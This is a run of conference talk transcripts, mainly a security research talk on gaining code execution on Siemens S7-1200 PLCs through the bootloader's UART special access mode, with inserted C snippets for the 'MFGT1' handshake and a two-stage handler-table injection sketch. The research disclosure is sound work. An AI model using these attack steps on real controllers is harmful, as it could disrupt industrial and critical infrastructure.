And there actually we had a bug in the baseband which would constantly keep rewriting some files on the flash of the SIM card. And actually we had some early adopters, users where the SIM cards got broken basically by constantly hammering them with write access. So yeah, but nothing that I know about any kind of access class bypass or something like that. Thank you. Microphone 6 which I often neglect because the lights are blinding me when I walk that way. Thanks for the helpful talk. I have a two-fold question. So if I understand correctly your talk, it's impossible to know the code that's running on the SIM right. So this two-fold question is about going further. Is there something better than the specs to understand more concretely those protocols? And is there any way to dump the code that's running on the SIMs? In terms of documentation beyond the specs, there is one document that I always like very much to recommend which is also leaked here. It's the so-called SIM Alliance stepping stones. No idea why it's called that way but that's how it's called. There's a hyperlink so if you work on the slides you can download it. That's a rather nice overview document about all the different specs and how it ties together. So I can recommend that in terms of tools to dump the code on the SIM card. Yes, of course, tools exist but those tools are highly specific to the given smart card operating system and or chip. And I'm not aware of any such tools ever having leaked. I get such tools for the cards that I, in the company that I work with. But yeah, of course, the SIM cards out in the field should be locked down from such tools and they are highly specific to the given OS and SIM. Okay, thank you. So maybe one addition to that. It's normally made in a way that basically if you want to sort of reset the card or something like that, once the card is in the operational life cycle state, which is when you use it normally, if you ever want to bypass some restriction or you want to sort of do something that is not permitted by the permissions anymore, you have to sort of recycle the card and get it back into the so-called personalization life cycle state. And most often that is done with a complete wipe at least of the file system or with a complete wipe of the operating system. So you back to the boot loader of the card and then you can basically start to recreate the card. But it's typically implemented in a way that it always is together with an erase. So they tried at least to make it safe. Oh, there's a question there, but not at the microphone. Oh, there is a microphone. Oh, sorry. But yeah, your job. Sorry. Yeah, I think the person behind mic four has been standing there for ages. You mentioned that the card can instruct the phone to open a website, but I've never seen this and I've seen use cases where I think it would be useful to do this. So is this not supported in most OSs or why? It's a good question. Actually, if you read all those specs, like especially these proactive SIM specs and so on, I always have the impression, okay, it's all very interesting, but I've never seen anything like that anywhere. So I completely agree with you. Whether or not it's supported by the phones is a good question. And I think without trying, there's no way to know. So you would actually have to write a small, like, send the Hello World app and to do that and see how to do testing with various phones. 
I would fear that since it's a feature that's specified but rarely used, a lot of devices will not support it or not support it properly because it's never tested because nobody has ever asked about testing it. But that's just my guess. Thank you. Mic one. Okay. Hello. My question is when you have an eSIM and you want to provisioning it, could you be done with tier 069 or something similar? No. There's a completely different set of protocols that are used for that and that relates to this global platform 2.2 NXP. I think it was. Yeah, I don't find it right now. But there's this spec and that specifies all the different interfaces and protocols that are used between the elements and it's completely different. I think also the requirements are very different because you have these multiple stakeholders. So you have the original card issuer, the original operator, then you have other operators and it's not like a single entity that just wants to provision its devices. But it's sort of a multi-stakeholder approach where you want to make sure that even in, like, a competition between operators still this is possible and that people put trust in the system that even if the original issuing operator doesn't like the other operator, it still will work and it will even work in 10 years from now or something when it's in the field. So I think the requirements are different. Thank you. That was the last question of the last talks of the day. Luckily not the last day. Not the last day, the first day. So there's three more days ahead of us. Thank you. Thank you. Thank you.
Billions of subscribers use SIM cards in their phones. Yet, outside a relatively small circle, information about SIM card technology is not widely known. This talk aims to be an in-depth technical overview. If at all, people know that once upon a time they were storing phone books on SIM cards. Every so often there is some IT security news about SIM card vulnerabilities and SIM card based attacks on subscribers. Let's have a look at SIM card technology during the past almost 30 years and cover topics like:
- quick intro to ISO 7816 smart cards
- SIM card hardware, operating system, applications
- SIM card related specification bodies, industry, processes
- from SIM to UICC, USIM, ISIM and more
- SIM toolkit, proactive SIM
- eSIM
10.5446/53174 (DOI)
So, Siemens recently decided to add some security features to their PLCs, and today we have Tobias and Ali, and they will be telling us what they managed to find in this PLC. They both come from Ruhr University Bochum. Tobias is a recent acquisition as a doctoral student and Ali is a postdoc. So, let's give them a hand. Welcome to our talk, a deep dive into code execution in Siemens PLCs. My name is Ali Abbasi and, as mentioned before, I'm a postdoc in security at Ruhr University Bochum, and here is my colleague. I'm Tobias. I'm very glad to be here. It's my fifth time at the Congress and I'm finally able to give back in a way, so I'm very excited about that. So, let's get into it. First, about the plan of the talk. We want to give you a little bit of background on what PLCs, programmable logic controllers, are all about, why we might want to use them and in what kind of setting, and then we want to go into the specifics of PLCs in the Siemens case. First we look a bit at the hardware, then at the software afterwards and the different findings that we had. At the end, we will show a demonstration of what we were able to achieve and conclude with some remarks. So, first of all, process automation. We all know it, or maybe we do it ourselves or we know somebody who does it. We put some devices in our smart home, if we call it smart already, and we try to automate different things to make our lives easier. Things like turning the heat up and down: we might not want to do that on our own, and we might not want to overheat or underheat, so what we do is basically have some sensor systems inside our homes as well as some devices that interact with those sensors. In this case, we might have a thermostat and a heater, and we want to adjust our temperature based on the thermostat. There are pretty simplistic solutions like this for the smart home. But what do we do if we have very complex control loops, for example? In the bottom left corner we can see a pretty complex looking picture: an operator sitting in front of what we call an HMI, a human machine interface, which is basically an aggregation of all the information about things that go on in a factory, for example. We need different sensors in this factory and we need to steer different motors and stuff like this. So we need things in the middle to kind of control all of this, and we do this using PLCs. Here we can see a setup and how it could look. We basically have a set of inputs, as we talked about, and a set of outputs, and we have some logic going on in the middle. What we typically deploy is a PLC, a programmable logic controller, with some logic in the middle. There are different technologies that can be used, for example structured text or ladder logic, which gets downloaded onto the PLC and then steers outputs based on the inputs it gets. Here we can see some applications of this kind of thing: for example, a chemical plant, an electric grid or some manufacturing. All of those components are pretty critical. Either we see them in our everyday lives, or sometimes we don't really see them, but they are steering everything in the background.
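Purely to illustrate the read-inputs, evaluate-logic, write-outputs cycle that such a controller runs, here is a toy sketch in Python; real PLC logic would be written in ladder logic or structured text, and the sensor values and thresholds below are made up.

```python
# Toy illustration of a PLC-style scan cycle (read inputs -> evaluate logic -> write
# outputs). Real PLC logic would be ladder logic or structured text; the pretend
# sensor values and hysteresis thresholds here are invented for the example.
import random
import time

def read_inputs():
    return {"temperature": random.uniform(15.0, 30.0)}   # pretend temperature sensor

def write_outputs(outputs):
    print("heater", "ON" if outputs["heater"] else "OFF")

heater_on = False
for _ in range(5):                  # a real PLC loops forever, typically every few milliseconds
    inputs = read_inputs()
    # simple hysteresis: switch on below 18 degrees, off above 22 degrees
    if inputs["temperature"] < 18.0:
        heater_on = True
    elif inputs["temperature"] > 22.0:
        heater_on = False
    write_outputs({"heater": heater_on})
    time.sleep(0.1)
```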
And we really don't want this to happen neither on accidental but also not on malicious basis. And this is why we want to secure all the processes going on in factories and the like. We've seen some of the recent attacks. So it started kind of in 1999 with the first initial reconnaissance base mainly and then we had some more advanced attacks in 2010, for example, where we saw Stuxnet which was very much a really intricate operation. If you think about it on technical level, what all went into it, what different skill sets were involved, it's pretty impressive. And then in the more recent time we had some issues in the Ukrainian power grid, which in 2015 and 16 just before Christmas some lights went out for quite a while in some cities there. So quite a bit of impact. So to give you a bit of impact background on Siemens PLCs here, when it comes to market shares we can see that together with Rockwell Automation Siemens actually has more than 50% market share in the market. And obviously if we take some devices that introduce some security, it would be interesting to look at those with the biggest market share. This is what we did here in the Siemens case. Here we can see the actual PLC that we will focus on in this talk, which is the Siemens S7-1200 PLC. It's one of the smaller PLCs, not quite the smallest. There is the logo as well, which is more of a playing around example. But this is the one that it's still pretty accessible to researchers in terms of costs. So it's like 250 for the PLC. Then if you need a power supply it can add the same. So as long as you don't break too many, spoiler, we broke quite some, or you don't drop them or something like this, then you're pretty fine. So you can kind of get the resources to play with those devices. We have different applications and we talked about them before. So here is what an unboxing of a Siemens S7-1200 PLC would look like. We have the top view here. In the left picture it's only one of different PCBs, which are layered onto each other in this case. But the real magic goes on in the top PCB, which is the green one that we see here. Looking at it a bit more in more detail, we have the top view on the left side, which shows the different components that really make the PLC tick. For example, the ARM CPU that we have, or different input outputs that we can connect to PLC, as we talked about before, which they need in order to see the different parts of the system. And then we have the flash chip on the top side as well, which is a bigger flash chip holding the firmware of the actual PLC, which we will talk about a bit more in detail later. On the flip side we have on the right picture the bottom side of the first layer PCB. And as we can see here, this is where the boot loader chip resides, which is an SPI flash chip of four megabytes holding the code of the Siemens PLC boot loader. Here we wanted to have a detailed view on what the actual processing unit on this board actually looks like. And what you can do if you really want to find out, you can do some decapping. And this is what we see here. The result of this, we can see that at the core of it is a ReneSys ARM Cortex R4 from 2010. And if you afterwards are more juggling with the software side of things, you may also want to find out the actual revision number, what it supports inside the ARM standard. And what you can do there is use a special instruction which resides in the ARM instruction set. 
And you can decode the different bits of it, which we did here, and which you can see here for reference. So if you really want to know what's going on, you can take apart those bits and make sure you're actually working with the hardware that you expect to be working with. So here's where we come to the memory part of the hardware, and this is where I hand over to Ali. Thanks. Now that Tobias has unboxed the PLC for us, I'm going to talk about quirks and features in the PLC. So as mentioned before, it's a Cortex-R4, revision three. It's big-endian, and it also only has an MPU, so there is basically no virtual memory. There are multiple RAM sizes, depending on which year you bought it or which variant of the S7-1200 you buy, and also multiple SPI flash sizes and multiple different types of NAND flashes. The most significant difference is in the RAM: sometimes they use Winbond and sometimes Micron, recently at least Micron RAM; it's LPDDR1 RAM. Then there is the SPI flash for the bootloader. Again depending on the variant, it's between 1 and 4 megabytes of SPI flash, and it contains different banks, each 512 kilobytes in size. And what the bootloader does, besides the typical actions of a bootloader like configuring the hardware, is verifying the integrity of the firmware before it is loaded. So we actually did some X-ray tomography of the PLC. It's basically 3D, so the PCB is rotating here, because we also wanted to do some hardware reverse engineering, and somebody at the university had a machine, so we didn't have to go to our dentist for the X-ray. So here is a quick 15-minute X-ray, which is not that good, but once you go deeper, eventually what you get is this. It's like a software animation: you can go inside the PCB and see all layers. It's amazing. So it's a 4-layer PCB, and besides VCC and GND there are basically two layers of PCB connections. So let's look at the startup process. Again, startup as usual: some hardware configuration happens, the vectored interrupt controller for example, and lots of these handlers for the different modes in ARM. Then there is a CRC checksum of the bootloader itself, which is easily bypassable because you can just overwrite the CRC. Then the bootloader, especially in the 2017-2018 variant of the Siemens PLC, allows you to overwrite the SPI flash, and it also eventually checks the CRC checksum of the firmware before basically loading it. The size of the bootloader itself is like 128 kilobytes; it's really even less than that, because half of it is just 0xFF. Siemens changed it multiple times; there are different versions. I think in two years we saw like three or four variants of the bootloader, so it was evolving; it was not something that everybody had forgotten about. So generally, as mentioned, you have the first stage of hardware initialization, then the bootloader is basically brought into RAM and its CRC checksum is checked, to make sure that it's not manipulated, which again can easily be bypassed. Then a second stage of hardware initialization happens, and at this moment it waits for a specific command for half a second. If it receives this command, it goes into another mode, which we'll discuss later. Otherwise, it basically prepares a CRC checksum table for the firmware.
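Referring back to the CPU identification mentioned at the start of this passage: on ARM, the main ID register packs implementer, variant, architecture, part number and revision into one 32-bit word. A small decoding sketch could look like this; the example value is made up for illustration and is not necessarily what the chip in the PLC reports.

```python
# Sketch of decoding an ARM main ID register (MIDR) value. The bit layout
# (implementer / variant / architecture / part number / revision) is the standard
# ARM one; the example value below is hypothetical.
def decode_midr(midr: int) -> dict:
    return {
        "implementer":  (midr >> 24) & 0xFF,   # 0x41 = ARM Ltd.
        "variant":      (midr >> 20) & 0xF,    # major revision, the "rN" part
        "architecture": (midr >> 16) & 0xF,    # 0xF = defined by the CPUID scheme
        "part_number":  (midr >> 4)  & 0xFFF,  # 0xC14 = Cortex-R4
        "revision":     midr & 0xF,            # minor revision, the "pN" part
    }

example = 0x411FC143                           # hypothetical: ARM implementer, Cortex-R4, r1p3
fields = decode_midr(example)
print({k: hex(v) for k, v in fields.items()})
print(f"r{fields['variant']}p{fields['revision']}, part {fields['part_number']:#x}")
```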
And then it tries to load the firmware, and eventually it just removes the memory barrier instruction, for those who know their ARM, and basically maps the firmware into memory. So, the name of the operating system, which was not mentioned before: it's Adonis. We know it in different ways, actually. First, in the references in the firmware we see lots of references to Adonis, but that was not enough for us, so we actually looked around to see if there is any other reference to it. And well, LinkedIn is one good open source. Here one employee, a Siemens developer, actually talks about working on Adonis, and that's why he put it right beside Windows and Linux; he says that he worked on this. That alone was still not enough for us, so maybe it's some OS we don't know, and we looked further and further and found this thing, which was the best indicator: a Siemens development engineer mentioned that he worked on kernel software development for the Adonis real-time operating system, which is a good sign for us; it means that we are right. So now that we know about the naming, and we're sure about that, let's look at the components. It actually starts at basically 0x440, then initializes the kernel, and then there are lots of routines for initializing different components of the operating system. I don't think Siemens actually groups it in this way; we don't have such a split in the firmware, but we actually did it like that. So we generalized it into two groups: some of them are core services, like Adonis real-time operating system services, and some of them are related to the automation part. Those people who are in the automation world, writing ladder logic and stuff like that, actually know those commands and function codes which are available in Siemens. These are the more automation-related services. So you have PROFINET, AWP or automation web programming, the MC7 JIT parser, basically for their ladder logic and the other programming languages, like basically their own JIT compiler inside the PLC. You also have the OMS, the configuration system, which again is very much related to the automation part, a core part of the automation system, and of course alarms, central IO and stuff like that related to automation. In the operating system part there are lots of the usual things: a file system, PDCFS, which Tobias talks about later, the TCP/IP stack, some C++ libraries which are not from Siemens but from Dinkumware, the MiniWeb web server, an MWSL parser, the MiniWeb scripting language parser, and lots of different subcomponents which are usual in an operating system; you can find them in any operating system. Also, there are some references to CoreSight. I don't know how many of you know CoreSight or how much you work with ARM, but basically CoreSight is something similar to Intel Processor Trace, or Intel PT, for tracing applications, and it can be used for getting code coverage, for example. And the hardware part is very well documented by Thomas Weber this year, the year's not over yet, so this year, at Black Hat Asia. But I have to warn you, because I received some emails and some people asked about that: if you connect to it, the PLC has an anti-debugging feature which detects that it's being debugged via JTAG and overwrites the NAND flash with random stuff, so you break the PLC. So connect to it at your own risk. Next, let's look at CoreSight just quickly.
CoreSight basically has, well, before I go on, I have to mention that Ralph Philipp also gave a good talk at ZeroNights about CoreSight tracing, so I would recommend you go look at that as well. But generally CoreSight has three major parts or components: sources, links, and sinks. Sinks are basically the part from which you actually get the tracing information, and sources are the part, it's a feature in the CPU, where you say what kind of sources you want to get the data from. And then links basically route these sources. I have to mention that it's very useful for fuzzing as well. I guess some people, very few, but some people are working on that: coverage-guided fuzzing via CoreSight, ARM CoreSight, is absolutely possible. Similar implementations have happened on top of Intel PT, for example kAFL, WinAFL, or honggfuzz. So sources basically have three different components: STM, PTM, ETM. ETM version four is the latest version of it. And you also have links, which connect different, or single, sources to different or single sinks. And then you have funnels for CoreSight. Sorry, sinks, sorry. You have sinks, which come in different kinds. Some are integrated into the CPU, which is a four-kilobyte ring buffer in SRAM, or you have system memory, or even the TPIU, or for example just the JTAG-DP port, the high-speed JTAG port. So now that CoreSight is clear: we actually searched for the existence of CoreSight. And as you can see, in the software part it's already implemented, so they actually have references in their software that are utilizing or configuring CoreSight in their PLCs. And we can see that the ETM version is not the latest version, it's ETM version three. Now that I have talked about CoreSight, Toby can talk about firmware dumps.
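As a small illustration of what "configuring CoreSight" looks like at the register level, here is a hedged C sketch. The lock-access offset 0xFB0, the unlock key 0xC5ACCE55 and the lock-status bit are standard ARM CoreSight conventions; the component base address is invented, and on this PLC the anti-JTAG warning above of course still applies.

#include <stdint.h>

#define REG32(a)        (*(volatile uint32_t *)(uintptr_t)(a))

#define CS_BASE         0x80001000u   /* hypothetical CoreSight component base */
#define CS_LAR          0xFB0u        /* Lock Access Register (standard offset) */
#define CS_LSR          0xFB4u        /* Lock Status Register */
#define CS_UNLOCK_KEY   0xC5ACCE55u   /* standard CoreSight unlock key */

static void coresight_unlock(uint32_t base)
{
    REG32(base + CS_LAR) = CS_UNLOCK_KEY;    /* allow register writes */
}

static int coresight_is_locked(uint32_t base)
{
    return (REG32(base + CS_LSR) >> 1) & 1u; /* SLK bit: 1 means still locked */
}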
So if we want to know what is kind of going on in the state of the firmware at a given point, we may want to look at the different stacks of the different modes at any given point. And this is the addresses that we extracted for this and you could use that as a starting point if you started reverse engineering things like that. Now we will have some tables with addresses and the first one is RAM mappings which show you what kind of functionality or what you might expect when looking at firmware code which is interfacing with different parts of memory. So if you initially go and look at some ARM code, you may just see a random access to some place in memory and you may want to know what it's actually doing. And it looks very uneventful if it's just an address and it gets curated and you don't really know what's going on. So for example, if you looked at an address within the text section, you would expect there to reside code. If you wanted to see some global static data, you would want to look at the data or the BSS section. And then finally, if you wanted to look at heap memory, look how chunks are set up there, you would look in the uninitialized section and it goes on like this for different sections. Another very interesting thing to look at if you try to reverse engineer firmware images is that you kind of want to know what the hardware is that a given piece of code is interfacing with. And in this case, we dumped some regions or reverse engineered what some regions are for what is called memory map dial. And the way ARM is talking to firmware is basically to query a magic value inside the address space and then it gets something back which is not at all what has been written there before. So it's basically an address which gets wired through to the peripheral, the hardware peripheral on the same system on a chip. And here we can see that we have different hardware peripherals residing on it. For example, we can talk to the Siemens PLC via different serial protocols. And those protocols might be SPI or I2C. And then we have on the left side kind of in the middle top part of it have some region pertaining to that. And then if you saw some other code talking to timers, for example, you would know you are in Timerland at the moment or like in the scheduler or whatever it would be. Finally, we have some MPU configurations which are memory protection unit configurations that we introduced earlier. So what we can see is that Siemens is actually applying some of those configurations to protect parts of memory. What we can see, for example, is whenever the XN, so the execute never bit is set, code is not to be executed within this address region or we have a read only region, we really don't want to have it overwritten. So it's interesting that they started playing this in practice. Here we can see what actually happens when the firmware itself boots up. So it turns out the firmware doesn't really want to depend too much on what the bootloader did. Probably it's different teams doing different things. And to keep this interface as small as possible, they kind of redo some of the stuff that the bootloader code also does. It sets up the vector table for handling interrupts and similar things like that. Then if we get past this initial stage, we actually want to boot the Adonis kernel, which Ali talked about before. 
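To connect this to actual firmware code: the regions described above are memory-mapped I/O, so "talking to hardware" is just loads and stores to fixed addresses through volatile pointers. Below is a tiny hedged sketch with made-up addresses, loosely modeled on a PL011-style UART rather than the real S7-1200 map.

#include <stdint.h>

#define REG32(addr)  (*(volatile uint32_t *)(uintptr_t)(addr))

/* Hypothetical peripheral layout, for illustration only. */
#define UART0_BASE   0x40010000u
#define UART0_DR     (UART0_BASE + 0x00u)   /* data register */
#define UART0_FR     (UART0_BASE + 0x18u)   /* flag register */
#define UART_FR_TXFF (1u << 5)              /* transmit FIFO full */

static void uart_putc(char c)
{
    while (REG32(UART0_FR) & UART_FR_TXFF)
        ;                                   /* spin until there is room */
    REG32(UART0_DR) = (uint8_t)c;
}

When the disassembly reads or writes an otherwise meaningless constant address, tables like the ones just described tell you whether you are looking at the SPI controller, a timer, or something else entirely.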
So first of all, there is an array of function pointers that gets called, one for pretty much every piece of functionality that we saw in this overview of the different components of ADONIS. So if you want to look at what kind of components, or functional components, are there, this is a very interesting list of functions and function handlers to examine. It also sets up some management structures and stuff like this that a typical operating system would have to set up. So now we look at more of the different components of ADONIS. The first one is the file system. For PLCs, part of the specification is sometimes how resilient they are against temperatures: how low a temperature can this PLC sit in without losing functionality. And in this case, what they also want to provide is some safety against interruptions of the power supply. So they developed a proprietary file system which is called the Powered-on Consistency File System, which they implement in the firmware. And we can also see one of the work experience entries of one of the previous Siemens employees, who stated that he or she worked on this file system. We have another very critical part of the functionality: of course, we want to talk to the PLC, and it wants to talk to us, and one of the ways is obviously TCP/IP. This is what exposes the web server, for example, and different other components. In this case, it turns out that Siemens doesn't implement their own, which is probably a good idea. They use the InterNiche Technologies TCP/IP stack in version 3.1. If you are good at Googling, you can find some source code, and you can actually map this to the firmware and how it works. That can give you some wrapper functions, something like creating sockets and stuff like this, and it can make it easier for you to find those in the firmware image. Another of the very critical components of every firmware is updates. If it allows an update, and the Siemens PLC allows updates, there are different modes. One of the modes is that you just drag and drop a UPD file, an update file, onto the web server, and it will start checking firmware integrity and signatures and so on. The second way is doing it via an SD card, which has a grand total of 24 megabytes, and for the low price of 250 euros you can get it. Thank you. You can't really beat that ratio. If you actually decompress this kind of UPD file, you get another representation of it in memory. We did some reverse engineering on that, and we have different fields. I'm not sure if you can see them now, but you can guess what they are: different offsets into the actual binary file, an entry point into the firmware, a magic header to make sure something is not too screwed up, and a CRC over the whole thing, for example. We also extracted some of the addresses inside the firmware image, which help you find a first foothold into what the logic is dealing with and give you some addresses that you can refer back to later. The next component that we want to touch on is MiniWeb, which is the web server. It exposes to you the different internal parts of the PLC: what the state of the different GPIOs, the general purpose inputs and outputs, is, and what the health of the PLC itself is. The way it exposes this is using the MWSL language, the MiniWeb scripting language. As we will see over the next slides, I will talk about that in a little bit more detail.
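For readers who want to poke at that update path, here is a hedged sketch of the kind of header parsing just described. Every field name, size and order is a guess that merely mirrors "offsets, entry point, magic, CRC"; it is not the real UPD layout.

#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Illustrative only: not the real UPD format. */
struct upd_header {
    uint8_t  magic[4];        /* fixed tag to catch corruption early */
    uint32_t entry_point;     /* where execution starts after loading */
    uint32_t payload_offset;  /* offset of the firmware body in the file */
    uint32_t payload_length;
    uint32_t header_crc;      /* CRC over the preceding fields */
};

int upd_header_plausible(const struct upd_header *h, size_t file_size)
{
    static const uint8_t expected[4] = { 'U', 'P', 'D', 0 };  /* made up */
    if (memcmp(h->magic, expected, sizeof expected) != 0)
        return 0;
    /* Bounds checks like these are exactly what such a parser must get
     * right: the offset and offset + length both have to stay in the file. */
    if (h->payload_offset > file_size ||
        h->payload_length > file_size - h->payload_offset)
        return 0;
    return 1;
}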
We also have it started as a service from one of the function handlers of the initialization functions that I referred to a little bit before. Now let's get to some undocumented HTTP handlers, which I think are very interesting. I think my favorites are Lili-Lili-Lili and Lolo-Lolo-Lolo. If you put those together in a clever way, maybe somebody here is musically gifted and can make a song out of it, I would be very interested to hear that. So now let's get to MWSL, the MiniWeb scripting language. It basically exposes the internal functionality by allowing you to inject different configuration parameters and stuff like this into an HTML page via templating. For example, as we can see here in the top right corner, you can see the CPU load of the system at a given time. It doesn't really seem to perform any output encoding, so it's kind of trusting whatever comes out. So there may be clever ways to do some web-related trickery with this. Also, the parsing and tokenization is kind of complex. We looked into it a bit, and this implementation could also be interesting to look at, but we will get to those kinds of aspects a bit later. With this, we want to get to our actual findings and talk about those a bit more, and this is where Ali will take over. Thanks, Toby. So now we talk about the capability which exists in the bootloader, which allows us to have unconstrained code execution. This feature is available over the UART, so you need physical access to the device. But once you have this physical access, as Toby will describe later, we can actually bypass the security ecosystem which Siemens developed in their product. So you need UART access. As documented here, you have TX, RX, and GND on the PLC, and the UART was actually documented in previous research as well. Every address which I'm talking about here or mention in this presentation is for bootloader version 4.2.1. As I mentioned earlier, Siemens actively modified their bootloader, so I think in two years we saw two or three modifications or different versions of their bootloader coming up. So this is exactly based on that half-second wait for a specific command after the second stage of hardware configuration happens. It applies to the Siemens S7-1200, including its variants, and to the S7-200 Smart. Actually, somebody from Kaspersky ICS Security mentioned that; we didn't even know about it. We only investigated the S7-1200, but Siemens later updated the advisory to say that it also applies to other products as well. So let's talk about this special access feature. As we mentioned, one of the things the bootloader does is initialize the hardware. After this, it basically copies some of the contents of the bootloader itself to a memory segment called IRAM. Then the PLC waits half a second for a specific command, and once it receives this specific command, it responds with a specific string. It's all happening over the UART. So if you send a magic string, MFGT1, sorry for my broken German, but probably it means Mit freundlichen Grüßen. Oh, I did it right. And then the PLC responds with '-CPU' and says that now you are in this special access mode: I am waiting for your commands. These strings are also available at 0xEDF8 in the bootloader. So here is a decoding from our client, which we'll release later, next year actually, where you can see 2D435055, which is the '-CPU' response from the PLC. So now we are in.
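A minimal POSIX sketch of that handshake, for anyone who wants to reproduce it: power-cycle the PLC, push the magic string down the UART inside the half-second window, and look for the '-CPU' answer. Only the two strings come from the talk; the device path, baud rate and framing here are assumptions, and the researchers' own client, once released, is the authoritative reference.

#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <termios.h>
#include <unistd.h>

int main(void)
{
    int fd = open("/dev/ttyUSB0", O_RDWR | O_NOCTTY);  /* adapter path is an assumption */
    if (fd < 0) { perror("open"); return 1; }

    struct termios tio;
    tcgetattr(fd, &tio);
    cfmakeraw(&tio);
    cfsetispeed(&tio, B115200);   /* the real baud rate may differ */
    cfsetospeed(&tio, B115200);
    tcsetattr(fd, TCSANOW, &tio);

    write(fd, "MFGT1", 5);        /* send right after resetting the PLC */

    char buf[64] = { 0 };
    ssize_t n = read(fd, buf, sizeof buf - 1);
    if (n > 0 && strstr(buf, "-CPU"))
        puts("special access prompt reached");

    close(fd);
    return 0;
}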
We also added some extra detail about the UART packet format, which somebody asked about before. So once you send this command, you get lots of functionality. Here in this presentation we call them handlers. Basically there are what we call the primary handlers, about 128 entries, and there are three other, separate handlers, which are 0x80, UART configuration, and bye. In the primary handlers there are lots of things. If you go back two slides, I showed the version there, 4.2.3, and what is happening is basically this command here, get bootloader version: we are just requesting, via the special access feature, that it tell us the bootloader version. You can also do lots of low-level diagnostic functionality there. There is also some functionality related to firmware updates, which bypasses the usual cryptographic verification of the firmware; it simply doesn't need it. So let's look at them, because for this work which we are talking about, we actually primarily only used two of the handlers. We don't look at, or we don't discuss now, all the other 128 handlers which exist in the PLC. So, how it works. One of the handlers, the interesting one for us, was handler 0x80, which is mentioned here as the update function. Basically what it does is allow you to write to a specific part of memory, the IRAM, into which some content of the bootloader was previously copied. So you send this handler after the handshake: you have to do this MFGT1 and then get the '-CPU' response, and then you send this handler. It then does some checks, because each handler might have different requirements, checking the number of arguments, for example, and then you are in this update function mode. Then you have to provide a target ID, because there are four sub-functionalities available once you enter this mode, and some of them are for IRAM, for SPI or I2C, or for flash. And for each of them you have to choose what kind of operation you want to do: config, read, write, or check. So you can do all of these things; you can read from and write to the IRAM. That is function handler 0x80. Next is a primary handler, 0x1C, which is listed in this handler list here. It basically allows you to call functions, functions which are listed in the IRAM. What you do is send the handshake, you are in this 0x1C handler, and then you can call the ID number of the handler which you want to use. So here you have lots of handlers available via 0x1C. So the question is: what can we do with it? And before I ask Tobias, I want to ask if anybody here has any idea. Trace. Trace? Somebody said trace. I don't know what that means. Just look at what is happening on the controller. Okay, you mean with CoreSight? No, we are not going to use that. So let's ask Tobias what he can do.
The way we can combine those two functions is basically to recap, use this OX1C handler which gives us control over what kind of secondary list functions are to be called. Which, as we saw before, is copied during the bootup process to a position in IRM from actual read-only memory. And this exposes this function handler table to anything that can write to IRM. And as we learned before, the OX80 handler is able to, in a limited capacity, do just that. And here we can see what we can try to do with this. So if we use in the first stage the OX80 handler to write to IRM, we can actually inject another function pointer together with some configuration values that allows us to pass different checks about argument sizes and stuff like this. We can inject this as an entry into this table. And we can also write to this table a payload which we can use as a shellcode. And then in the second stage we can use this previously injected index that we specified just as a trigger to call our own payload. So now we have code execution in the context of the bootloader, which is as privileged as we can get at that point. And we can see what we can play around with this. And as a little summary is that we chain all this together and we get code execution and with Ali's words with this technology, we're going to rocket the PLC. And before we go into what this actually allows us to do is a little word about the stage of payload. So I wrote this chain of different invocations and it turns out that this write to IRM is somehow very slow in the first place, but then also error prone so the device can just error out. I'm not quite sure what this pertains to, but it would be interesting to know from the Siemens engineer. But it basically led to me having to inject a little encoded payload which just has a subset of bytes which gives us an interface to perform more performant reads and writes with an arbitrary write primitive and then use this to inject second stage payloads. And this is what we want to demonstrate here. Thanks. So now we will have our demo, four demos actually. So the first one is actually just seeing the communication, basically sending this request and getting a response and basically sending the stage payload. So in the op is the raw UART communication. Don't worry, it's getting zoomed later. And in the down is like our client which actually talking with the PLC and sending these commands. So we are just running our UART and here is we are sending our command. And if you look at it in op, you see that dash CPU signal came from the PLC and now we are sending our stager and a stager just send us just one acknowledgement so we know that's a stager running successfully. This is for framework version, bootloader version 421 basically. So now we are going to do something else. We are going to actually dump the framework from a running PLC and compare it with the framework downloaded from Siemens website. So first we are going to actually unpack the framework downloaded from Siemens website because it's a compressed with LZP3. So that's what we are going to do. I hope. Oh, no, we are actually setting up our SSL connection first. So SSL port forwarding, SSH port forwarding before and we are just checking that the PLC is running properly. So like this is not a broken PLC or something like that. We wrote something so we just make sure that the web server is opening. We open the web server. Yeah, it's open. Good. And also try to log in to the web server of the PLC. 
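Purely as a mental model, this is roughly what that two-stage chain looks like when written down. Every address, structure layout and helper below is invented (the real protocol framing lives in the researchers' client), and the stubs just print what they would send so the sketch compiles and runs as a dry run.

#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

/* Guessed shape of a secondary handler-table slot. */
struct handler_entry {
    uint32_t func_ptr;   /* where handler 0x1C would branch to */
    uint32_t min_args;   /* argument-count checks to satisfy */
    uint32_t max_args;
};

/* Stand-ins for the UART protocol wrappers (handlers 0x80 and 0x1C). */
static void iram_write(uint32_t addr, const void *data, uint32_t len)
{
    (void)data;
    printf("0x80: write %" PRIu32 " bytes to IRAM @ 0x%08" PRIx32 "\n", len, addr);
}

static void call_handler_by_index(uint32_t index)
{
    printf("0x1C: invoke secondary handler %" PRIu32 "\n", index);
}

static void inject_and_run(const uint8_t *shellcode, uint32_t len)
{
    const uint32_t payload_addr = 0x00020000u;  /* "free" IRAM, hypothetical */
    const uint32_t table_slot   = 0x0001F000u;  /* unused table entry, hypothetical */
    struct handler_entry e = { payload_addr, 0, 0 };

    iram_write(payload_addr, shellcode, len);   /* stage 1: place the payload */
    iram_write(table_slot, &e, sizeof e);       /* stage 1: forge a table slot */
    call_handler_by_index(42u);                 /* stage 2: trigger our entry */
}

int main(void)
{
    uint8_t payload[] = { 0xde, 0xad, 0xbe, 0xef };  /* placeholder bytes */
    inject_and_run(payload, sizeof payload);
    return 0;
}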
